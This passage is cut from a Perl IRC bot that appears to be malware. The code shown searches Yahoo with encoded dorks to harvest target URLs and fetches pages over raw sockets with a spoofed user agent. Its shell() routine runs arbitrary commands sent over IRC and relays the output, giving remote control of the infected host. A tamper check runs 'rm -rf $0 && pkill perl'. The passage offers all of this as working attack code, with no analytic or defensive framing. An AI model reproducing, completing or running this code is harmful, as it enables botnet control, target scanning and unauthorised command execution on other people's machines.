my @grep = links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub yahoo() {
my @list;
my $key = $_[0];
for (my $i=1; $i<=500; $i+=1) {
my $search = ("http://www.search.yahoo.com/search?p=".key($key)."&ei=UTF-8&fr=yfp-t-501&fp_ip=IT&pstart=1&b=".$i);
my $res = search_engine_query($search);
while ($res =~ m/26u=(.*?)%26w=/g) {
my $link = $1;
if ($link!~ /yahoo/){
my @grep = links($link);
push(@list,@grep);
}
}
}
return @list;
}
#########################################
sub clean() {
my @cln = ();
my %visit = ();
foreach my $element (@_) {
$element =~ s/\/+/\//g;
next if $visit{$element}++;
push @cln, $element;
}
return @cln;
}
sub key() {
my $dork = $_[0];
$dork =~ s/ /\+/g;
$dork =~ s/:/\%3A/g;
$dork =~ s/\//\%2F/g;
$dork =~ s/\?/\%3F/g;
$dork =~ s/&/\%26/g;
$dork =~ s/\"/\%22/g;
$dork =~ s/,/\%2C/g;
$dork =~ s/\\/\%5C/g;
$dork =~ s/@/\%40/g;
$dork =~ s/\[/\%5B/g;
$dork =~ s/\]/\%5D/g;
$dork =~ s/\?/\%3F/g;
$dork =~ s/\=/\%3D/g;
$dork =~ s/\|/\%7C/g;
return $dork;
}
sub links() {
my @list;
my $link = $_[0];
my $host = $_[0];
my $hdir = $_[0];
$hdir =~ s/(.*)\/[^\/]*$/$1/;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host .= "/";
$link .= "/";
$hdir .= "/";
$host =~ s/\/\//\//g;
$hdir =~ s/\/\//\//g;
$link =~ s/\/\//\//g;
push(@list,$link,$host,$hdir);
return @list;
}
sub search_engine_query($) {
my $url = $_[0];
$url =~ s/http:\/\///;
my $host = $url;
my $query = $url;
my $page = "";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~ s/$host//;
if ($query eq "") { $query = "/"; }
eval {
my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: $uagent\r\n\r\n";
my @pages = <$sock>;
$page = "@pages";
close($sock);
};
return $page;
}
#########################################
sub shell() {
my $path = $_[0];
my $cmd = $_[1];
if ($cmd =~ /cd (.*)/) {
chdir("$1") || &msg("$path","4No such file or directory");
return;
}
elsif ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
my @output = `$cmd 2>&1 3>&1`;
my $c = 0;
foreach my $output (@output) {
$c++;
chop $output;
&msg("$path","$output");
if ($c == 5) { $c = 0; sleep 2; }
}
exit;
}}
}
sub isAdmin() {
my $status = 0;
my $nick = $_[0];
if ($nick eq $admin) { $status = 1; }
return $status;
}
sub msg() {
return unless $#_ == 1;
sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]");
}
sub SIGN() {
if (($powered !~ /t/)||($mail !~ /bot/)) {
print "\nLAMER DETECTED FVCK YOU. YOU NOT HACKER. U JUST SCRIPT KIDDIES\n\n";
exec("rm -rf $0 && pkill perl");
}
}
sub nick() {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub notice() {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}